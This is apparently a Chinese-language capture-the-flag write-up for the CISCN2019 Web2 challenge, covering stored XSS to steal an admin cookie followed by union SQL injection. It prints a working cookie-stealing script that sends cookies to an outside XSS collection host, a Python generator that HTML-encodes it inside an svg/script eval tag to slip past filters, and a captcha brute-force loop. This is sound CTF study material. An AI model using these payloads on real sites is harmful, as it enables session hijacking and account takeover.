[CISCN2019 华东北赛区]Web2刷题笔记
最近的学习时间大部分用在了新东西上面,只靠刷刷freebuf偶尔刷道ctf题来温一温之前的方向了
题目登陆注册后可以发表投稿和反馈,提供了xss平台
存在admin.php页面需要身份认证才能访问
思路:投稿带有xss代码,反馈去让管理员访问,打到管理员cookie进入admin.php
xss平台源码
(function(){(new Image()).src='http://xss.buuoj.cn/index.php?do=api&id=hPpiFj&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})(); if('1'==1){keep=new Image();keep.src='http://xss.buuoj.cn/index.php?do=keepsession&id=hPpiFj&url='+escape(document.location)+'&cookie='+escape(document.cookie)};
将(new Image()).src改为window.location.href,把新建图像的函数改为直接跳转
直接交平台给出来的会被过滤,用html编码进行绕过,利用svg标签,eval执行代码
html编码并生成payload脚本
words="(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=hPpiFj&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();" re="" for c in words: re+="&#"+str(ord(c)) print("<svg><script>eval"+re+"</script>")
提交后拿到页面的url到反馈页面提交
需要验证码md5前六位为固定值,脚本爆破即可
import hashlib for i in range(1,10000000000): md = hashlib.md5(str(i).encode("utf-8")).hexdigest() if md[0:6]=='6a1b6f': print(i)
提交成功后拿到管理员cookie,携带后访问admin.php
最简单的联合注入拿flag